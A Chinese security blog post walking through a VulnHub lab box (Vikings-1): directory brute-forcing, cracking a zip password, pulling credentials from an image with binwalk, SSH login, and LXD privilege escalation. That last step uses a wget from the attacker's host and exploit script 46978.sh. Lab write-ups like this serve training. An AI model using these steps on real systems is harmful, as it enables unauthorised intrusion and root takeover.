大余每日一攻防VIKINGS-1(十四)
2023-12-15 16:9:18 Author: www.freebuf.com(查看原文) 阅读量:2 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

简介

每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场,为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升,使他们更好地理解实际攻击和防御场景。

每日一攻防特色:
环境攻破:以简单直白的方式攻破每日选择的渗透测试环境。
代码审计:进行攻防分析,结合代码审计,深入挖掘漏洞和强化防御。

作者:大余

一、网络枚举

1702627216_657c0790ab089d8bcf1c0.png!small?1702627217687
发现ip地址:192.168.3.86

1702627222_657c0796d2efb075a08d9.png!small?1702627223478
192.168.3.86

二、web信息收集

发现site目录:
1702627227_657c079b30425be1e20dc.png!small?1702627228058

1702627233_657c07a1497d21940cfc2.png!small?1702627234247
找了一下没有什么有用的信息!目录爆破:

gobuster dir -u http://192.168.3.86/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh

1702627236_657c07a4d668d7529ad6d.png!small?1702627237497
发现有一个war.txt!
1702627240_657c07a89cee8aba11ec6.png!small?1702627241228
提示存在访问目录信息!

三、编码爆破

1702627245_657c07ad9bb99a517c159.png!small?1702627246773
访问发现这是base64编码信息,编码下载:
1702627249_657c07b1b0cfbfcc89a4f.png!small?1702627250919
使用file命令发现,是一个zip文件,解压:
1702627253_657c07b59ccfc04775bb9.png!small?1702627254522
需要密码爆破,使用zip2john把他的密码信息提取出来用john爆破:
1702627267_657c07c3dd732ea831108.png!small?1702627268728

ragnarok123

四、隐写解密

解压后发现一张图:
1702627274_657c07cab38f996d0252d.png!small?1702627275488
用binwalk查看一下有没有隐藏文件:
1702627280_657c07d00d04d97222dad.png!small?1702627281262
用-e提取出来发现两个文件信息。
1702627284_657c07d40487ee18cdc3d.png!small?1702627285768
发现一组类似账号密码!

五、信息收集

ssh [email protected]
f@m0usboatbuilde7

1702627288_657c07d8e25b3aa9b2b4d.png!small?1702627290159
成功登录进来。

1702627295_657c07df426d6f9c86389.png!small?1702627296106
发现lxd,LXD是下一代系统容器管理器,它为用户提供了与虚拟机类似的环境!直接lxd提权root!!

六、提权

wget http://192.168.3.149:8000/alpine-v3.17-x86_64-20230110_0404.tar.gz

1702627300_657c07e4f3cbc6d0f22a5.png!small?1702627301501
防火墙拦截了,改为80端口即可。
1702627338_657c080a4581c3a11205e.png!small?1702627339559
lxd关闭下网络:
1702627344_657c0810a61f9eca9cefe.png!small?1702627345809
一路回车即可!直接exp提权:
1702627348_657c08149a65f5e31f988.png!small?1702627350090
上传脚本直接提权即可:

./46978.sh -f alpine-v3.17-x86_64-20230110_0404.tar.gz

1702627371_657c082b34535c1fc8bb6.png!small?1702627372368

1702627375_657c082fbaeea7b95ce4b.png!small?1702627376780
这里并没有什么可分析的源代码。

通过每日一攻防,我致力于共同深探网络安全的奥秘,助力每位参与者成为网络安全领域的技术高手。立即加入大余安全,共同迎接每日新的挑战!

扫描下方二维码添加小助手,进群和大余老师一起技术探讨交流吧!

1701847681_657022811043209291287.png!small?1701847682244

欢迎大家进入大余安全回忆录帮会,每周二&五定期更新《安全开发》、《渗透测试》系列文章,帮助大家从0基础到入门。

1701847704_65702298ccb7a072cd4c7.png!small?1701847708052


文章来源: https://www.freebuf.com/vuls/386779.html
如有侵权请联系:admin#unsafe.sh